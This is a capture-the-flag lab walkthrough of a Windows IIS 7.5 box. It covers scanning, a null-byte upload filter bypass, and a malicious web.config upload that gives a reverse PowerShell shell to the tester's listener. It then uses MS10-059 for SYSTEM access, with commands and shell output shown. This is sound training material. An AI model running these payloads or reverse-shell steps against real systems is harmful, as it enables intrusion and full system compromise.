The box only had port 80 running which had an application that allows to upload files while preventing asp, aspx and few other file extensions.
I was bale to bypass the upload filter using a null byte %00.jpg but the application generated an error giving a clue about something related to web.config.
After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded and I was able to get a shell.
For privilege escalation, I was able to get system using MS10-059
# Nmap 7.80 scan initiated Sun Mar 8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93 Nmapscanreportfor10.10.10.93Hostisup (0.040s latency).PORTSTATESERVICEVERSION80/tcpopenhttpMicrosoftIIShttpd7.5|http-methods:|_Potentiallyriskymethods:TRACE|_http-server-header:Microsoft-IIS/7.5|_http-title:BountyServiceInfo:OS:Windows; CPE:cpe:/o:microsoft:windowsServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.# Nmap done at Sun Mar 8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds# Nmap 7.80 scan initiated Sun Mar 8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93Nmapscanreportfor10.10.10.93Hostisup.All1000scannedportson10.10.10.93areopen|filtered# Nmap done at Sun Mar 8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds
Enumerating HTTP
Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.
Nikto
Nothing much was found with Nikto
nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------
I tried uploading a file with ASP, ASPX and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte %00 to attempt to bypass the upload filter.
When I tried to execute the shellie.aspx file http://10.10.10.93/UploadedFiles/shellie.aspx I got the following error below.
I have no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and to my surprise, I found the following link stating that we can actually upload a *.config file with asp code and it would work.
Here is the link:
Explanation of web.config as quoted from the link above:
Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
Executed it via http://10.10.10.93/UploadedFiles/web.config
Started the listener on port 8008 ( I edited on the nishang reverse tcp script)
Got a shell as merlin
Started python http server
# To server the nishang revser powershell scriptpython3-mhttp.server80ServingHTTPon0.0.0.0port80 (http://0.0.0.0:80/) ...10.10.10.93-- [09/Mar/2020 00:21:47]"GET /pwsh.ps1 HTTP/1.1"200-# Listenner to capture the shell# rlwrap nc -lnvp 8008listeningon [any] 8008 ...connectto [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158WindowsPowerShellrunningasuserBOUNTY$ onBOUNTYCopyright (C) 2015 Microsoft Corporation. All rights reserved.PSC:\windows\system32\inetsrv>whoamibounty\merlin
./windows-exploit-suggester.py-d2020-03-06-mssb.xls-isysinfo_bounty[*] initiating winsploit version 3.3...[*] database file detected as xls or xlsx based on extension[*] attempting to read from the systeminfo input file[+] systeminfo input file read successfully (ascii)[*] querying database file for potential vulnerabilities[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits[*] there are now 197 remaining vulns[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin[+] windows version identified as 'Windows 2008 R2 64-bit'[*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
I used MS10-059. A google search on MS10-059 github takes you to the following link with an exe executable
Download the executable to the target using certutil
# On the target boxPSC:\users\merlin\documents>.\MS10-059.exe10.10.14.39002# On my Kali boxrlwrapnc-lnvp9002listeningon [any] 9002 ...connectto [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181MicrosoftWindows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\users\merlin\documents>whoamiwhoamintauthority\systemC:\users\merlin\documents>